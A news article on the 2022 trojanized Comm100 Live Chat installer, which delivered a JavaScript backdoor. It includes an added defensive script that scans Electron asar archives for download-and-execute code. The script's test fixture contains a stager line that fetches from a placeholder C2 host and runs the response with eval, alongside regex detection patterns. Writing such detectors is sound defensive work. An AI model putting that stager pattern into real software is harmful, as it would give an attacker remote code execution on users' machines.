Suspected Chinese hackers have hijacked the installer of a widely used software product to distribute malware, in what appears to be a supply chain attack similar to the SolarWinds compromise, a new report from cybersecurity firm CrowdStrike revealed.
The attack targeted Vancouver-based customer service company Comm100, which provides chat services on websites and social media. The campaign delivered malware through a trojanized installer for the Comm100 Live Chat app, signed with a valid Comm100 certificate dated September 26, 2022. Comm100’s website claims more than 15,000 customers in 51 countries.
The installer is an Electron application that contains a JavaScript (JS) backdoor in the file main.js of the embedded Asar archive. The backdoor downloads and executes a second-stage script, which gives the threat actor a remote shell that can be used to install additional malware.
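Defensive triage of the mechanism just described, as an added example that is not part of the CrowdStrike report or of Comm100's software: it parses the header of an Electron app.asar, extracts every main.js and flags the download-plus-execute pattern. The in-memory archive, the indicator regexes and the C2_URL name inside the fixture are constructed for the example.

```javascript
'use strict';
// Added triage helper (not CrowdStrike's or Comm100's code): parse an Electron app.asar header,
// pull every main.js out of the archive and flag download-and-execute patterns.
// asar layout: [u32 = 4][u32 headerPickleLen][u32 payloadLen][u32 jsonLen][json][file data]
function parseAsar(buf) {
  const headerPickleLen = buf.readUInt32LE(4), jsonLen = buf.readUInt32LE(12);
  const header = JSON.parse(buf.subarray(16, 16 + jsonLen).toString('utf8'));
  const filesStart = 8 + headerPickleLen;  // file data follows the header pickle
  const files = {};
  (function walk(node, prefix) {
    for (const [name, entry] of Object.entries(node.files)) {
      const path = prefix ? `${prefix}/${name}` : name;
      if (entry.files) walk(entry, path);              // directory node
      else if (!entry.unpacked) {                      // "unpacked" files live outside the archive
        const off = filesStart + Number(entry.offset); // offsets are stored as decimal strings
        files[path] = buf.subarray(off, off + entry.size);
      }
    }
  })(header, '');
  return files;
}

// A stager must fetch remote content and run it; flag main.js only when both classes appear.
const INDICATORS = [
  /require\(['"]https?['"]\)|\bfetch\(/,           // outbound HTTP(S)
  /\beval\(|new\s+Function\(|\bchild_process\b/,   // dynamic code or process execution
];
function scanMainJs(files) {
  return Object.entries(files).filter(([p]) => /(^|\/)main\.js$/.test(p)).map(([path, data]) => {
    const hits = INDICATORS.filter((re) => re.test(data.toString('utf8'))).length;
    return { path, hits, suspicious: hits === INDICATORS.length };
  });
}

// Build a small flat asar in memory (constructed fixture, so the example runs offline).
function buildAsar(fileMap) {
  const names = Object.keys(fileMap), datas = names.map((n) => Buffer.from(fileMap[n], 'utf8'));
  const files = {}; let offset = 0;
  names.forEach((n, i) => { files[n] = { size: datas[i].length, offset: String(offset) }; offset += datas[i].length; });
  const json = Buffer.from(JSON.stringify({ files }), 'utf8');
  const padded = Math.ceil(json.length / 4) * 4;   // pickle strings are padded to 4 bytes
  const hdr = Buffer.alloc(16 + padded);
  hdr.writeUInt32LE(4, 0); hdr.writeUInt32LE(8 + padded, 4);           // size pickle
  hdr.writeUInt32LE(4 + padded, 8); hdr.writeUInt32LE(json.length, 12); // header pickle
  json.copy(hdr, 16);
  return Buffer.concat([hdr, ...datas]);
}

const SAMPLE = buildAsar({ 'package.json': '{"name":"constructed-fixture"}',
  'main.js': "const https = require('https');\nhttps.get(C2_URL, r => { let b = ''; r.on('data', d => b += d); r.on('end', () => eval(b)); });" });
```

Point parseAsar at the bytes of a real app.asar (for example from the resources directory of an installed Electron app) to run the same scan against an installer under investigation.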
According to CrowdStrike, the attack occurred from at least September 27, 2022 through the morning of September 29, 2022. Organizations affected include companies in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe. Although CrowdStrike did not reveal how many companies were hit, people familiar with the situation cited a dozen known victims.
The researchers attribute the attack to a Chinese threat actor based on several factors, including the “presence of Chinese-language comments in the malware,” the use of Alibaba infrastructure to host C2 servers, and tactics, techniques and procedures (TTPs) linked to previous attacks “targeting of online gambling entities in East and Southeast Asia,” an area that has long been of interest to Chinese hackers.